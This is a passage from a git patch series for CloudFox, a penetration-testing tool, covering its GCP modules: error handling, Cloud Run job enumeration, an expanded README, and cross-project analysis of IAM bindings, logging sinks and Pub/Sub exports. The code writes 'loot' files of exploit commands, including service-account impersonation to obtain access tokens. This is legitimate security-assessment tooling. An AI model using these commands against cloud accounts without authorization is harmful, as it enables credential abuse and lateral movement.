v0.0.0-20200526211855-cb27e3aa2013/go.mod h1:NbSheEEYHJ7i3ixzK3sjbqSGDJWnxyFXZblF3eUsNvo= google.golang.org/genproto v0.0.0-20251202230838-ff82c1b0f217 h1:GvESR9BIyHUahIb0NcTum6itIWtdoglGX+rnGxm2934= google.golang.org/genproto v0.0.0-20251202230838-ff82c1b0f217/go.mod h1:yJ2HH4EHEDTd3JiLmhds6NkJ17ITVYOdV3m3VKOnws0= google.golang.org/genproto/googleapis/api v0.0.0-20251202230838-ff82c1b0f217 h1:fCvbg86sFXwdrl5LgVcTEvNC+2txB5mgROGmRL5mrls= google.golang.org/genproto/googleapis/api v0.0.0-20251202230838-ff82c1b0f217/go.mod h1:+rXWjjaukWZun3mLfjmVnQi18E1AsFbDN9QdJ5YXLto= google.golang.org/genproto/googleapis/rpc v0.0.0-20251202230838-ff82c1b0f217 h1:gRkg/vSppuSQoDjxyiGfN4Upv/h/DQmIR10ZU8dh4Ww= google.golang.org/genproto/googleapis/rpc v0.0.0-20251202230838-ff82c1b0f217/go.mod h1:7i2o+ce6H/6BluujYR+kqX3GKH+dChPTQU19wjRPiGk= +google.golang.org/grpc v1.19.0/go.mod h1:mqu4LbDTu4XGKhr4mRzUsmM4RtVoemTSY81AxZiDr8c= +google.golang.org/grpc v1.23.0/go.mod h1:Y5yQAOtifL1yxbo5wqy6BxZv8vAUGQwXBOALyacEbxg= +google.golang.org/grpc v1.25.1/go.mod h1:c3i+UQWmh7LiEpx4sFZnkU36qjEYZ0imhYfXVyQciAY= +google.golang.org/grpc v1.27.0/go.mod h1:qbnxyOmOxrQa7FizSgH+ReBfzJrCY1pSN7KXBS8abTk= +google.golang.org/grpc v1.33.2/go.mod h1:JMHMWHQWaTccqQQlmk3MJZS+GWXOdAesneDmEnv2fbc= google.golang.org/grpc v1.77.0 h1:wVVY6/8cGA6vvffn+wWK5ToddbgdU3d8MNENr4evgXM= google.golang.org/grpc v1.77.0/go.mod h1:z0BY1iVj0q8E1uSQCjL9cppRj+gnZjzDnzV0dHhrNig= +google.golang.org/protobuf v0.0.0-20200109180630-ec00e32a8dfd/go.mod h1:DFci5gLYBciE7Vtevhsrf46CRTquxDuWsQurQQe4oz8= +google.golang.org/protobuf v0.0.0-20200221191635-4d8936d0db64/go.mod h1:kwYJMbMJ01Woi6D6+Kah6886xMZcty6N08ah7+eCXa0= +google.golang.org/protobuf v0.0.0-20200228230310-ab0ca4ff8a60/go.mod h1:cfTl7dwQJ+fmap5saPgwCLgHXTUD7jkjRqWcaiX5VyM= +google.golang.org/protobuf v1.20.1-0.20200309200217-e05f789c0967/go.mod h1:A+miEFZTKqfCUM6K7xSMQL9OKL/b6hQv+e19PK+JZNE= +google.golang.org/protobuf v1.21.0/go.mod h1:47Nbq4nVaFHyn7ilMalzfO3qCViNmqZ2kzikPIcrTAo= +google.golang.org/protobuf v1.22.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= +google.golang.org/protobuf v1.23.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= +google.golang.org/protobuf v1.23.1-0.20200526195155-81db48ad09cc/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= +google.golang.org/protobuf v1.25.0/go.mod h1:9JNX74DMeImyA3h4bdi1ymwjUzf21/xIlbajtzgsN7c= google.golang.org/protobuf v1.36.11 h1:fV6ZwhNocDyBLK0dj+fg8ektcVegBBuEolpbTQyBNVE= google.golang.org/protobuf v1.36.11/go.mod h1:HTf+CrKn2C3g5S8VImy6tdcUvCska2kB7j23XfzDpco= gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= @@ -539,3 +622,5 @@ gopkg.in/yaml.v2 v2.4.0/go.mod h1:RDklbk79AGWmwhnvt/jBztapEOGDOx6ZbXqjP6csGnQ= gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA= gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= +honnef.co/go/tools v0.0.0-20190102054323-c2f93a96b099/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= +honnef.co/go/tools v0.0.0-20190523083050-ea95bdfd59fc/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= diff --git a/internal/gcp/base.go b/internal/gcp/base.go index 2b93b5f6..5eef0901 100644 --- a/internal/gcp/base.go +++ b/internal/gcp/base.go @@ -42,6 +42,10 @@ func ParseGCPError(err error, apiName string) error { if strings.Contains(errStr, "SERVICE_DISABLED") { return fmt.Errorf("%w: %s", ErrAPINotEnabled, apiName) } + // Check for quota project requirement (API not enabled or misconfigured) + if strings.Contains(errStr, "requires a quota project") { + return fmt.Errorf("%w: %s (enable API or set quota project)", ErrAPINotEnabled, apiName) + } return ErrPermissionDenied case codes.NotFound: @@ -332,6 +336,11 @@ func InitializeCommandContext(cmd *cobra.Command, moduleName string) (*CommandCo outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") format, _ := parentCmd.PersistentFlags().GetString("output") + // Default to "all" format if not set (GCP doesn't expose this flag yet) + if format == "" { + format = "all" + } + // -------------------- Get project IDs from context -------------------- var projectIDs []string if value, ok := ctx.Value("projectIDs").([]string); ok && len(value) > 0 { diff --git a/internal/output2.go b/internal/output2.go index 93542b3b..3b1929b1 100644 --- a/internal/output2.go +++ b/internal/output2.go @@ -246,8 +246,21 @@ func HandleStreamingOutput( return fmt.Errorf("failed to finalize tables: %w", err) } - if verbosity >= 2 { - logger.InfoM(fmt.Sprintf("Output written to %s", outDirectoryPath), baseCloudfoxModule) + // Log individual output files like the non-streaming output does + for _, t := range dataToOutput.TableFiles() { + safeName := sanitizeFileName(t.Name) + if format == "all" || format == "table" { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(outDirectoryPath, "table", safeName+".txt")), baseCloudfoxModule) + } + if format == "all" || format == "csv" { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(outDirectoryPath, "csv", safeName+".csv")), baseCloudfoxModule) + } + if format == "all" || format == "json" { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(outDirectoryPath, "json", safeName+".jsonl")), baseCloudfoxModule) + } + } + for _, l := range dataToOutput.LootFiles() { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(outDirectoryPath, "loot", l.Name+".txt")), baseCloudfoxModule) } return nil From fbc862aef1f5b3196e50d984501c962b5a52b589 Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Mon, 12 Jan 2026 21:38:31 -0500 Subject: [PATCH 09/48] updated readme --- README.md | 111 ++++++++++++++++++++++++++++++++++++++++++++++++------ 1 file changed, 99 insertions(+), 12 deletions(-) diff --git a/README.md b/README.md index d9f5fd53..0c1a03a0 100644 --- a/README.md +++ b/README.md @@ -52,9 +52,9 @@ For the full documentation please refer to our [wiki](https://github.com/BishopF | Provider| CloudFox Commands | | - | - | -| AWS | 34 | -| Azure | 4 | -| GCP | 8 | +| AWS | 34 | +| Azure | 4 | +| GCP | 57 | | Kubernetes | Support Planned | @@ -159,22 +159,109 @@ Additional policy notes (as of 09/2022): # GCP Commands -| Provider | Command Name | Description + +## Identity & Access Management +| Provider | Command Name | Description | +| - | - | - | +| GCP | whoami | Display identity context for the authenticated GCP user/service account | +| GCP | iam | Enumerate GCP IAM principals across organizations, folders, and projects | +| GCP | permissions | Enumerate ALL permissions for each IAM entity with full inheritance explosion | +| GCP | serviceaccounts | Enumerate GCP service accounts with security analysis | +| GCP | service-agents | Enumerate Google-managed service agents | +| GCP | keys | Enumerate all GCP keys (SA keys, HMAC keys, API keys) | +| GCP | resource-iam | Enumerate IAM policies on GCP resources (buckets, datasets, secrets, etc.) | +| GCP | domain-wide-delegation | Find service accounts with Domain-Wide Delegation to Google Workspace | +| GCP | privesc | Identify privilege escalation paths in GCP projects | + +## Compute & Containers +| Provider | Command Name | Description | +| - | - | - | +| GCP | instances | Enumerate GCP Compute Engine instances with security configuration | +| GCP | gke | Enumerate GKE clusters with security analysis | +| GCP | cloudrun | Enumerate Cloud Run services and jobs with security analysis | +| GCP | functions | Enumerate GCP Cloud Functions with security analysis | +| GCP | app-engine | Enumerate App Engine applications and security configurations | +| GCP | composer | Enumerate Cloud Composer environments | +| GCP | dataproc | Enumerate Dataproc clusters | +| GCP | dataflow | Enumerate Dataflow jobs and pipelines | +| GCP | notebooks | Enumerate Vertex AI Workbench notebooks | +| GCP | workload-identity | Enumerate GKE Workload Identity and Workload Identity Federation | + +## Storage & Databases +| Provider | Command Name | Description | +| - | - | - | +| GCP | buckets | Enumerate GCP Cloud Storage buckets with security configuration | +| GCP | bucket-enum | Enumerate GCS buckets for sensitive files (credentials, secrets, configs) | +| GCP | bigquery | Enumerate GCP BigQuery datasets and tables with security analysis | +| GCP | cloudsql | Enumerate Cloud SQL instances with security analysis | +| GCP | spanner | Enumerate Cloud Spanner instances and databases | +| GCP | bigtable | Enumerate Cloud Bigtable instances and tables | +| GCP | filestore | Enumerate Filestore NFS instances | +| GCP | memorystore | Enumerate Memorystore (Redis) instances | + +## Networking +| Provider | Command Name | Description | +| - | - | - | +| GCP | vpc-networks | Enumerate VPC Networks | +| GCP | firewall | Enumerate VPC networks and firewall rules with security analysis | +| GCP | loadbalancers | Enumerate Load Balancers | +| GCP | dns | Enumerate Cloud DNS zones and records with security analysis | +| GCP | endpoints | Enumerate all network endpoints (external and internal) with IPs, ports, and hostnames | +| GCP | private-service-connect | Enumerate Private Service Connect endpoints and service attachments | +| GCP | network-topology | Visualize VPC network topology, peering relationships, and trust boundaries | + +## Security & Compliance +| Provider | Command Name | Description | +| - | - | - | +| GCP | vpc-sc | Enumerate VPC Service Controls | +| GCP | access-levels | Enumerate Access Context Manager access levels | +| GCP | cloud-armor | Enumerate Cloud Armor security policies and find weaknesses | +| GCP | iap | Enumerate Identity-Aware Proxy configurations | +| GCP | beyondcorp | Enumerate BeyondCorp Enterprise configurations | +| GCP | kms | Enumerate Cloud KMS key rings and crypto keys with security analysis | +| GCP | secrets | Enumerate GCP Secret Manager secrets with security configuration | +| GCP | cert-manager | Enumerate SSL/TLS certificates and find expiring or misconfigured certs | +| GCP | org-policies | Enumerate organization policies and identify security weaknesses | + +## CI/CD & Source Control +| Provider | Command Name | Description | +| - | - | - | +| GCP | artifact-registry | Enumerate GCP Artifact Registry and Container Registry with security configuration | +| GCP | cloudbuild | Enumerate Cloud Build triggers and builds | +| GCP | source-repos | Enumerate Cloud Source Repositories | +| GCP | scheduler | Enumerate Cloud Scheduler jobs with security analysis | + +## Messaging & Events +| Provider | Command Name | Description | +| - | - | - | +| GCP | pubsub | Enumerate Pub/Sub topics and subscriptions with security analysis | + +## Logging & Monitoring +| Provider | Command Name | Description | +| - | - | - | +| GCP | logging | Enumerate Cloud Logging sinks and metrics with security analysis | +| GCP | logging-gaps | Find resources with missing or incomplete logging | + +## Organization & Projects +| Provider | Command Name | Description | +| - | - | - | +| GCP | organizations | Enumerate GCP organization hierarchy | +| GCP | asset-inventory | Enumerate Cloud Asset Inventory with optional dependency analysis | +| GCP | backup-inventory | Enumerate backup policies, protected resources, and identify backup gaps | +| GCP | cross-project | Analyze cross-project access patterns for lateral movement | + +## Attack Path Analysis +| Provider | Command Name | Description | | - | - | - | -| GCP | [whoami](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#whoami) | Display the email address of the GCP authenticated user | -| GCP | [all-checks](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#all-checks) | Runs all available GCP commands | -| GCP | [artifact-registry](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#artifact-registry) | Display GCP artifact registry information | -| GCP | [bigquery](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#bigquery) | Display Bigquery datasets and tables information | -| GCP | [buckets](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#buckets) | Display GCP buckets information | -| GCP | [iam](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#iam) | Display GCP IAM information | -| GCP | [instances](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#instances) | Display GCP Compute Engine instances information | -| GCP | [secrets](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#secrets) | Display GCP secrets information | +| GCP | lateral-movement | Map lateral movement paths, credential theft vectors, and pivot opportunities | +| GCP | data-exfiltration | Identify data exfiltration paths and high-risk data exposure | # Authors * [Carlos Vendramini](https://github.com/carlosvendramini-bf) * [Seth Art (@sethsec](https://twitter.com/sethsec)) +* Joseph Barcia # Contributing [Wiki - How to Contribute](https://github.com/BishopFox/cloudfox/wiki#how-to-contribute) From 3c1213b0ff58af6973ef32c9f557116d7a1ec48f Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Tue, 13 Jan 2026 11:03:22 -0500 Subject: [PATCH 10/48] fixed cloudrun 400 error --- gcp/commands/assetinventory.go | 7 +- .../cloudrunService/cloudrunService.go | 79 ++++++++++++++++--- internal/gcp/base.go | 6 +- 3 files changed, 76 insertions(+), 16 deletions(-) diff --git a/gcp/commands/assetinventory.go b/gcp/commands/assetinventory.go index 937f0348..77b31f6f 100644 --- a/gcp/commands/assetinventory.go +++ b/gcp/commands/assetinventory.go @@ -265,7 +265,9 @@ func (m *AssetInventoryModule) processProjectsDependencies(ctx context.Context, assetClient, err := asset.NewClient(ctx) if err != nil { - logger.ErrorM(fmt.Sprintf("Failed to create Cloud Asset client: %v", err), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + parsedErr := gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_ASSET_INVENTORY_MODULE_NAME, + "Could not create Cloud Asset client") return } defer assetClient.Close() @@ -308,7 +310,8 @@ func (m *AssetInventoryModule) processProjectWithDependencies(ctx context.Contex } if err != nil { m.CommandCounter.Error++ - gcpinternal.HandleGCPError(err, logger, globals.GCP_ASSET_INVENTORY_MODULE_NAME, + parsedErr := gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_ASSET_INVENTORY_MODULE_NAME, fmt.Sprintf("Could not enumerate assets in project %s", projectID)) break } diff --git a/gcp/services/cloudrunService/cloudrunService.go b/gcp/services/cloudrunService/cloudrunService.go index 068e9cef..fbdd46b3 100644 --- a/gcp/services/cloudrunService/cloudrunService.go +++ b/gcp/services/cloudrunService/cloudrunService.go @@ -4,6 +4,7 @@ import ( "context" "fmt" "strings" + "sync" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" run "google.golang.org/api/run/v2" @@ -158,7 +159,27 @@ func (cs *CloudRunService) Services(projectID string) ([]ServiceInfo, error) { return services, nil } +// cloudRunRegions contains all Cloud Run regions +// Note: Cloud Run Jobs API does NOT support the "-" wildcard for locations (unlike Services API) +// so we need to iterate through regions explicitly +var cloudRunRegions = []string{ + // Tier 1 regions + "asia-east1", "asia-northeast1", "asia-northeast2", "asia-south1", + "europe-north1", "europe-west1", "europe-west4", + "me-west1", "us-central1", "us-east1", "us-east4", "us-east5", "us-south1", "us-west1", + // Tier 2 regions + "africa-south1", "asia-east2", "asia-northeast3", "asia-southeast1", "asia-southeast2", "asia-south2", + "australia-southeast1", "australia-southeast2", + "europe-central2", "europe-west2", "europe-west3", "europe-west6", + "me-central1", "me-central2", + "northamerica-northeast1", "northamerica-northeast2", + "southamerica-east1", "southamerica-west1", + "us-west2", "us-west3", "us-west4", +} + // Jobs retrieves all Cloud Run jobs in a project across all regions +// Note: The Cloud Run Jobs API does NOT support the "-" wildcard for locations +// unlike the Services API, so we must iterate through regions explicitly func (cs *CloudRunService) Jobs(projectID string) ([]JobInfo, error) { ctx := context.Background() @@ -168,21 +189,53 @@ func (cs *CloudRunService) Jobs(projectID string) ([]JobInfo, error) { } var jobs []JobInfo + var mu sync.Mutex + var wg sync.WaitGroup + var lastErr error + var errMu sync.Mutex + + // Use a semaphore to limit concurrent API calls + semaphore := make(chan struct{}, 10) // Max 10 concurrent requests + + // Iterate through all Cloud Run regions in parallel + for _, region := range cloudRunRegions { + wg.Add(1) + go func(region string) { + defer wg.Done() + + // Acquire semaphore + semaphore <- struct{}{} + defer func() { <-semaphore }() + + parent := fmt.Sprintf("projects/%s/locations/%s", projectID, region) + + call := service.Projects.Locations.Jobs.List(parent) + err := call.Pages(ctx, func(page *run.GoogleCloudRunV2ListJobsResponse) error { + for _, job := range page.Jobs { + info := parseJobInfo(job, projectID) + mu.Lock() + jobs = append(jobs, info) + mu.Unlock() + } + return nil + }) + + if err != nil { + // Track the last error but continue - region may not have jobs or API may not be enabled + // Common errors: 404 (no jobs in region), 403 (permission denied) + errMu.Lock() + lastErr = err + errMu.Unlock() + } + }(region) + } - // List jobs across all locations - parent := fmt.Sprintf("projects/%s/locations/-", projectID) - - call := service.Projects.Locations.Jobs.List(parent) - err = call.Pages(ctx, func(page *run.GoogleCloudRunV2ListJobsResponse) error { - for _, job := range page.Jobs { - info := parseJobInfo(job, projectID) - jobs = append(jobs, info) - } - return nil - }) + wg.Wait() - if err != nil { - return nil, gcpinternal.ParseGCPError(err, "run.googleapis.com") + // Only return error if we got no jobs AND had errors + // If we found jobs in some regions, that's success + if len(jobs) == 0 && lastErr != nil { + return nil, gcpinternal.ParseGCPError(lastErr, "run.googleapis.com") } return jobs, nil diff --git a/internal/gcp/base.go b/internal/gcp/base.go index 5eef0901..dfa8ec3c 100644 --- a/internal/gcp/base.go +++ b/internal/gcp/base.go @@ -44,7 +44,7 @@ func ParseGCPError(err error, apiName string) error { } // Check for quota project requirement (API not enabled or misconfigured) if strings.Contains(errStr, "requires a quota project") { - return fmt.Errorf("%w: %s (enable API or set quota project)", ErrAPINotEnabled, apiName) + return fmt.Errorf("%w: %s (set quota project with: gcloud auth application-default set-quota-project PROJECT_ID)", ErrAPINotEnabled, apiName) } return ErrPermissionDenied @@ -110,6 +110,10 @@ func ParseGCPError(err error, apiName string) error { if strings.Contains(errStr, "SERVICE_DISABLED") { return fmt.Errorf("%w: %s", ErrAPINotEnabled, apiName) } + // Check for quota project requirement (common with ADC) + if strings.Contains(errStr, "requires a quota project") { + return fmt.Errorf("%w: %s (set quota project with: gcloud auth application-default set-quota-project PROJECT_ID)", ErrAPINotEnabled, apiName) + } if strings.Contains(errStr, "PERMISSION_DENIED") || strings.Contains(errStr, "PermissionDenied") { return ErrPermissionDenied } From 7bb7d947ef17cc92eff22fd4ff33104c1559d36d Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Tue, 13 Jan 2026 15:22:36 -0500 Subject: [PATCH 11/48] fixed logging newline, more 400 errors, text formatting, and enhancements in dns, filestore, endpoints, and dataefil --- README.md | 7 +- cli/gcp.go | 3 +- gcp/commands/crossproject.go | 321 ++-- gcp/commands/dataexfiltration.go | 798 +++++++--- gcp/commands/dns.go | 77 +- gcp/commands/endpoints.go | 1341 +++++++++++------ gcp/commands/filestore.go | 150 +- gcp/commands/lateralmovement.go | 14 +- gcp/commands/publicaccess.go | 1189 +++++++++++++++ .../composerService/composerService.go | 83 +- .../crossProjectService.go | 338 +++++ gcp/services/dnsService/dnsService.go | 138 ++ .../filestoreService/filestoreService.go | 33 +- .../schedulerService/schedulerService.go | 83 +- globals/gcp.go | 1 + internal/log.go | 10 +- 16 files changed, 3673 insertions(+), 913 deletions(-) create mode 100644 gcp/commands/publicaccess.go diff --git a/README.md b/README.md index 0c1a03a0..af82060a 100644 --- a/README.md +++ b/README.md @@ -54,7 +54,7 @@ For the full documentation please refer to our [wiki](https://github.com/BishopF | - | - | | AWS | 34 | | Azure | 4 | -| GCP | 57 | +| GCP | 58 | | Kubernetes | Support Planned | @@ -248,13 +248,14 @@ Additional policy notes (as of 09/2022): | GCP | organizations | Enumerate GCP organization hierarchy | | GCP | asset-inventory | Enumerate Cloud Asset Inventory with optional dependency analysis | | GCP | backup-inventory | Enumerate backup policies, protected resources, and identify backup gaps | -| GCP | cross-project | Analyze cross-project access patterns for lateral movement | ## Attack Path Analysis | Provider | Command Name | Description | | - | - | - | | GCP | lateral-movement | Map lateral movement paths, credential theft vectors, and pivot opportunities | -| GCP | data-exfiltration | Identify data exfiltration paths and high-risk data exposure | +| GCP | data-exfiltration | Identify data exfiltration paths with VPC-SC and Org Policy protection status | +| GCP | public-access | Find resources with allUsers/allAuthenticatedUsers access across 16 GCP services | +| GCP | cross-project | Analyze cross-project IAM bindings, logging sinks, and Pub/Sub exports for lateral movement | diff --git a/cli/gcp.go b/cli/gcp.go index ede190ea..7f770a8d 100644 --- a/cli/gcp.go +++ b/cli/gcp.go @@ -83,7 +83,7 @@ var ( os := oauthservice.NewOAuthService() principal, err := os.WhoAmI() if err != nil { - GCPLogger.FatalM(fmt.Sprintf("could not determine default user credential with error %s. \n\nPlease use default application default credentials: https://cloud.google.com/docs/authentication/application-default-credentials", err.Error()), "gcp") + GCPLogger.FatalM(fmt.Sprintf("could not determine default user credential with error %s.\n\nPlease use default application default credentials: https://cloud.google.com/docs/authentication/application-default-credentials\n\nTry: gcloud auth application-default login", err.Error()), "gcp") } ctx = context.WithValue(ctx, "account", principal.Email) cmd.SetContext(ctx) @@ -243,6 +243,7 @@ func init() { commands.GCPCertManagerCommand, commands.GCPLateralMovementCommand, commands.GCPDataExfiltrationCommand, + commands.GCPPublicAccessCommand, // All checks (last) GCPAllChecksCommand, diff --git a/gcp/commands/crossproject.go b/gcp/commands/crossproject.go index c25e9e01..23278fb8 100644 --- a/gcp/commands/crossproject.go +++ b/gcp/commands/crossproject.go @@ -16,25 +16,23 @@ var GCPCrossProjectCommand = &cobra.Command{ Use: globals.GCP_CROSSPROJECT_MODULE_NAME, Aliases: []string{"cross-project", "xproject", "lateral"}, Short: "Analyze cross-project access patterns for lateral movement", - Long: `Analyze cross-project IAM bindings to identify lateral movement paths. + Long: `Analyze cross-project access patterns to identify lateral movement paths and data flows. This module is designed for penetration testing and identifies: - Service accounts with access to multiple projects - Cross-project IAM role bindings - Potential lateral movement paths between projects +- Cross-project logging sinks (data exfiltration via logs) +- Cross-project Pub/Sub exports (data exfiltration via messages) Features: - Maps cross-project service account access -- Identifies high-risk cross-project roles (owner, editor, admin) +- Identifies cross-project roles (owner, editor, admin) +- Discovers logging sinks sending logs to other projects +- Discovers Pub/Sub subscriptions exporting to other projects (BQ, GCS, push) - Generates exploitation commands for lateral movement - Highlights service accounts spanning trust boundaries -Risk Analysis: -- CRITICAL: Owner/Editor/Admin roles across projects -- HIGH: Sensitive admin roles (IAM, Secrets, Compute) -- MEDIUM: Standard roles with cross-project access -- LOW: Read-only cross-project access - WARNING: Requires multiple projects to be specified for effective analysis. Use -p for single project or -l for project list file.`, Run: runGCPCrossProjectCommand, @@ -46,10 +44,12 @@ Use -p for single project or -l for project list file.`, type CrossProjectModule struct { gcpinternal.BaseGCPModule - CrossBindings []crossprojectservice.CrossProjectBinding - CrossProjectSAs []crossprojectservice.CrossProjectServiceAccount - LateralMovementPaths []crossprojectservice.LateralMovementPath - LootMap map[string]*internal.LootFile + CrossBindings []crossprojectservice.CrossProjectBinding + CrossProjectSAs []crossprojectservice.CrossProjectServiceAccount + LateralMovementPaths []crossprojectservice.LateralMovementPath + CrossProjectSinks []crossprojectservice.CrossProjectLoggingSink + CrossProjectPubSub []crossprojectservice.CrossProjectPubSubExport + LootMap map[string]*internal.LootFile } // ------------------------------ @@ -81,6 +81,8 @@ func runGCPCrossProjectCommand(cmd *cobra.Command, args []string) { CrossBindings: []crossprojectservice.CrossProjectBinding{}, CrossProjectSAs: []crossprojectservice.CrossProjectServiceAccount{}, LateralMovementPaths: []crossprojectservice.LateralMovementPath{}, + CrossProjectSinks: []crossprojectservice.CrossProjectLoggingSink{}, + CrossProjectPubSub: []crossprojectservice.CrossProjectPubSubExport{}, LootMap: make(map[string]*internal.LootFile), } @@ -126,21 +128,34 @@ func (m *CrossProjectModule) Execute(ctx context.Context, logger internal.Logger m.LateralMovementPaths = paths } - if len(m.CrossBindings) == 0 && len(m.CrossProjectSAs) == 0 && len(m.LateralMovementPaths) == 0 { + // Find cross-project logging sinks + sinks, err := svc.FindCrossProjectLoggingSinks(m.ProjectIDs) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CROSSPROJECT_MODULE_NAME, + "Could not find cross-project logging sinks") + } else { + m.CrossProjectSinks = sinks + } + + // Find cross-project Pub/Sub exports + pubsubExports, err := svc.FindCrossProjectPubSubExports(m.ProjectIDs) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CROSSPROJECT_MODULE_NAME, + "Could not find cross-project Pub/Sub exports") + } else { + m.CrossProjectPubSub = pubsubExports + } + + if len(m.CrossBindings) == 0 && len(m.CrossProjectSAs) == 0 && len(m.LateralMovementPaths) == 0 && + len(m.CrossProjectSinks) == 0 && len(m.CrossProjectPubSub) == 0 { logger.InfoM("No cross-project access patterns found", globals.GCP_CROSSPROJECT_MODULE_NAME) return } - // Count high-risk findings - criticalCount := 0 - highCount := 0 + // Add findings to loot for _, binding := range m.CrossBindings { - switch binding.RiskLevel { - case "CRITICAL": - criticalCount++ - case "HIGH": - highCount++ - } m.addBindingToLoot(binding) } @@ -152,13 +167,18 @@ func (m *CrossProjectModule) Execute(ctx context.Context, logger internal.Logger m.addLateralMovementToLoot(path) } - logger.SuccessM(fmt.Sprintf("Found %d cross-project binding(s), %d cross-project SA(s), %d lateral movement path(s)", - len(m.CrossBindings), len(m.CrossProjectSAs), len(m.LateralMovementPaths)), globals.GCP_CROSSPROJECT_MODULE_NAME) + for _, sink := range m.CrossProjectSinks { + m.addLoggingSinkToLoot(sink) + } - if criticalCount > 0 || highCount > 0 { - logger.InfoM(fmt.Sprintf("[PENTEST] Found %d CRITICAL, %d HIGH risk cross-project bindings!", criticalCount, highCount), globals.GCP_CROSSPROJECT_MODULE_NAME) + for _, export := range m.CrossProjectPubSub { + m.addPubSubExportToLoot(export) } + logger.SuccessM(fmt.Sprintf("Found %d binding(s), %d SA(s), %d lateral path(s), %d logging sink(s), %d pubsub export(s)", + len(m.CrossBindings), len(m.CrossProjectSAs), len(m.LateralMovementPaths), + len(m.CrossProjectSinks), len(m.CrossProjectPubSub)), globals.GCP_CROSSPROJECT_MODULE_NAME) + m.writeOutput(ctx, logger) } @@ -166,49 +186,23 @@ func (m *CrossProjectModule) Execute(ctx context.Context, logger internal.Logger // Loot File Management // ------------------------------ func (m *CrossProjectModule) initializeLootFiles() { - m.LootMap["crossproject-exploit-commands"] = &internal.LootFile{ - Name: "crossproject-exploit-commands", - Contents: "# Cross-Project Exploit Commands\n# Generated by CloudFox\n\n", - } - m.LootMap["crossproject-enum-commands"] = &internal.LootFile{ - Name: "crossproject-enum-commands", - Contents: "# Cross-Project Enumeration Commands\n# External/Cross-Tenant principals with access to your projects\n# Generated by CloudFox\n\n", + m.LootMap["crossproject-commands"] = &internal.LootFile{ + Name: "crossproject-commands", + Contents: "# Cross-Project Commands\n# Generated by CloudFox\n\n", } } func (m *CrossProjectModule) addBindingToLoot(binding crossprojectservice.CrossProjectBinding) { // Add exploitation commands if len(binding.ExploitCommands) > 0 { - m.LootMap["crossproject-exploit-commands"].Contents += fmt.Sprintf( - "# %s -> %s (Principal: %s, Role: %s)\n", + m.LootMap["crossproject-commands"].Contents += fmt.Sprintf( + "# IAM Binding: %s -> %s\n# Principal: %s\n# Role: %s\n", binding.SourceProject, binding.TargetProject, binding.Principal, binding.Role, ) for _, cmd := range binding.ExploitCommands { - m.LootMap["crossproject-exploit-commands"].Contents += cmd + "\n" + m.LootMap["crossproject-commands"].Contents += cmd + "\n" } - m.LootMap["crossproject-exploit-commands"].Contents += "\n" - } - - // Check for cross-tenant/external access - if isCrossTenantPrincipal(binding.Principal, m.ProjectIDs) { - m.LootMap["crossproject-enum-commands"].Contents += fmt.Sprintf( - "# External Principal: %s\n"+ - "# Target Project: %s\n"+ - "# Role: %s\n", - binding.Principal, - binding.TargetProject, - binding.Role, - ) - - // External service accounts - add check command - if strings.Contains(binding.Principal, "serviceAccount:") { - m.LootMap["crossproject-enum-commands"].Contents += fmt.Sprintf( - "gcloud projects get-iam-policy %s --flatten='bindings[].members' --filter='bindings.members:%s'\n", - binding.TargetProject, - strings.TrimPrefix(binding.Principal, "serviceAccount:"), - ) - } - m.LootMap["crossproject-enum-commands"].Contents += "\n" + m.LootMap["crossproject-commands"].Contents += "\n" } } @@ -265,7 +259,7 @@ func isCrossTenantPrincipal(principal string, projectIDs []string) bool { func (m *CrossProjectModule) addServiceAccountToLoot(sa crossprojectservice.CrossProjectServiceAccount) { // Add impersonation commands for cross-project SAs - m.LootMap["crossproject-exploit-commands"].Contents += fmt.Sprintf( + m.LootMap["crossproject-commands"].Contents += fmt.Sprintf( "# Cross-project SA: %s (Home: %s)\n"+ "gcloud auth print-access-token --impersonate-service-account=%s\n\n", sa.Email, sa.ProjectID, sa.Email, @@ -274,7 +268,7 @@ func (m *CrossProjectModule) addServiceAccountToLoot(sa crossprojectservice.Cros func (m *CrossProjectModule) addLateralMovementToLoot(path crossprojectservice.LateralMovementPath) { // Add lateral movement exploitation commands - m.LootMap["crossproject-exploit-commands"].Contents += fmt.Sprintf( + 